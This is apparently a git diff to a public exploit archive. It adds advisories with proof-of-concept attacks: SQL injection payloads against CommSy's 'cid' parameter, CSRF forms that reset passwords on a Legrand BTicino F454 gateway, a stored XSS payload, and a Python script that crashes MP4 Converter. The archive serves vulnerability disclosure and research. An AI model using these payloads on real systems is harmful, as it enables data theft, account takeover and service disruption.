diff --git a/exploits/php/remote/46839.rb b/exploits/php/remote/46839.rb
index 571c0d384..034dbe352 100755
--- a/exploits/php/remote/46839.rb
+++ b/exploits/php/remote/46839.rb
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'References' =>
         [
           ['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details
-          ['URL', 'https://www.php-fusion.co.uk']
+          ['URL', 'https://www.php-fusion.co.uk'],
+          ['URL', 'https://github.com/php-fusion/PHP-Fusion/commit/943432028b9e674433bb3f2a128b2477134110e6']
         ],
       'Platform' => 'php',
       'Arch' => ARCH_PHP,
diff --git a/exploits/php/webapps/46849.txt b/exploits/php/webapps/46849.txt
new file mode 100644
index 000000000..74871475f
--- /dev/null
+++ b/exploits/php/webapps/46849.txt
@@ -0,0 +1,56 @@
+Title:
+======
+CommSy 8.6.5 - SQL injection
+
+Researcher:
+===========
+Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
+
+CVE-ID:
+=======
+CVE-2019-11880
+
+Timeline:
+=========
+2019-04-15 Vulnerability discovered
+2019-04-15 Asked for security contact and PGP key
+2019-04-16 Send details to the vendor
+2019-05-07 Flaw was approved but will not be fixed in branch 8.6
+2019-05-15 Public disclosure
+
+Affected Products:
+==================
+CommSy <= 8.6.5
+
+Vendor Homepage:
+================
+https://www.commsy.net
+
+Details:
+========
+CommSy is a web-based community system, originally developed at the
+University of Hamburg, Germany, to support learning/working communities.
+We have discovered a unauthenticated SQL injection vulnerability in
+CommSy <= 8.6.5 that makes it possible to read all database content. The
+vulnerability exists in the HTTP GET parameter "cid".
+
+Proof of Concept:
+=================
+boolean-based blind:
+commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823
+ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login
+
+error-based:
+commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT
+COUNT(*),CONCAT(0x716a767871,(SELECT
+(ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login
+
+time-based blind:
+commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login
+
+Fix:
+====
+According to the manufacturer, the version branch 8.6 is no longer
+supported and the vulnerability will not be fixed. Customers should
+update to the newest version 9.2.
\ No newline at end of file
diff --git a/exploits/php/webapps/46850.txt b/exploits/php/webapps/46850.txt
new file mode 100644
index 000000000..36053e8bb
--- /dev/null
+++ b/exploits/php/webapps/46850.txt
@@ -0,0 +1,118 @@
+<!--
+
+Legrand BTicino Driver Manager F454 1.0.51 CSRF Change Password Exploit
+
+
+Vendor: BTicino S.p.A.
+Product web page: https://www.bticino.com
+
+Affected version: Hardware Platform: F454
+                  Firmware version: 1.0.51
+                  Driver Manager version: 1.1.14
+
+Summary: Audio/video web server for the remote control of the
+system using web pages or the MY HOME portal. The device can
+operate as a gateway for the use of the MHVisual and Virtual
+Configurator software - 6 DIN modules. It replaces item F453
+and F453AV.
+
+Desc: The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks
+to verify the requests. This can be exploited to perform certain
+actions with administrative privileges if a logged-in user visits
+a malicious web site.
+
+Tested on: Apache/2.2.14 (Unix)
+           OpenSSL/1.0.0d
+           PHP/5.1.6
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                                  @zeroscience
+
+
+Advisory ID: ZSL-2019-5521
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5521.php
+
+30.04.2019
+
+-->
+
+
+<!-- CSRF PoC web access password change -->
+<html>
+  <body>
+    <form action="http://192.168.1.66:8080/system/password.save.php" method="POST">
+      <input type="hidden" name="password1" value="newpass123" />
+      <input type="hidden" name="password2" value="newpass123" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+<!-- CSRF PoC OpenWebNet password change -->
+<html>
+  <body>
+    <form action="http://192.168.1.66:8080/system/ownpassword.save.php" method="POST">
+      <input type="hidden" name="ownpassword" value="ilegnisi" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+<!--
+
+Legrand BTicino Driver Manager F454 1.0.51 Authenticated Stored XSS Exploit
+
+
+Vendor: BTicino S.p.A.
+Product web page: https://www.bticino.com
+
+Affected version: Hardware Platform: F454
+                  Firmware version: 1.0.51
+                  Driver Manager version: 1.1.14
+
+Summary: Audio/video web server for the remote control of the
+system using web pages or the MY HOME portal. The device can
+operate as a gateway for the use of the MHVisual and Virtual
+Configurator software - 6 DIN modules. It replaces item F453
+and F453AV.
+
+Desc: The application suffers from an authenticated stored XSS
+via GET request. The issue is triggered when input passed via
+the GET parameter 'server' is not properly sanitized before
+being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session in
+context of an affected site.
+
+Tested on: Apache/2.2.14 (Unix)
+           OpenSSL/1.0.0d
+           PHP/5.1.6
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                                  @zeroscience
+
+
+Advisory ID: ZSL-2019-5522
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5522.php
+
+30.04.2019
+
+-->
+
+
+<!-- Stored XSS via GET request -->
+<html>
+  <body>
+    <form action="http://192.168.1.66:8080/system/time.ntp.php">
+      <input type="hidden" name="mode" value="mine" />
+      <input type="hidden" name="server" value='"><marquee>Waddup.</marquee>' />
+      <input type="submit" value="Signal" />
+    </form>
+  </body>
+</html>
+
+<!-- GET http://192.168.1.66:8080/system/time.ntp.php?mode=mine&server="><marquee>Waddup.</marquee> HTTP/1.1 -->
\ No newline at end of file
diff --git a/exploits/windows/dos/46848.py b/exploits/windows/dos/46848.py
new file mode 100755
index 000000000..a6dff74f8
--- /dev/null
+++ b/exploits/windows/dos/46848.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: MP4 Converter 3.25.22 - 'Name' Denial of Service (PoC)
+# Date: 14/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.tomabo.com/
+# Software: http://www.tomabo.com/downloads/mp4-converter-setup.exe
+# Version: 3.25.22
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "MP4Converter.py", it will create a new file "MP4Converter.txt"
+# 2.- Copy the text from the generated MP4Converter.txt file to clipboard
+# 3.- Open MP4 Converter
+# 4.- Select 'Options' > 'Video/Audio Formats'
+# 5.- Click 'Add Preset' and paste clipboard in the field 'Name'
+# 6.- Click 'OK' and click 'Reset All' 
+# 7.- Crashed
+
+buffer = "\x41" * 10000
+f = open ("MP4Converter.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index cc245b1cc..2e60d1548 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6426,6 +6426,7 @@ id,file,description,date,author,type,platform,port
 46843,exploits/windows/dos/46843.py,"TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
 46844,exploits/windows/dos/46844.py,"TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
 46845,exploits/windows/dos/46845.py,"TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
+46848,exploits/windows/dos/46848.py,"Tomabo MP4 Converter 3.25.22 - Denial of Service (PoC)",2019-05-15,"Alejandra Sánchez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41272,3 +41273,5 @@ id,file,description,date,author,type,platform,port
 46841,exploits/hardware/webapps/46841.txt,"D-Link DWL-2600AP - Multiple OS Command Injection",2019-05-14,"Raki Ben Hamouda",webapps,hardware,
 46846,exploits/php/webapps/46846.txt,"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection",2019-05-14,"Julien Ahrens",webapps,php,80
 46847,exploits/php/webapps/46847.txt,"PasteShr 1.6 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80
+46849,exploits/php/webapps/46849.txt,"CommSy 8.6.5 - SQL injection",2019-05-15,"Jens Regel_ Schneider_ Wulf",webapps,php,
+46850,exploits/php/webapps/46850.txt,"Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting",2019-05-15,LiquidWorm,webapps,php,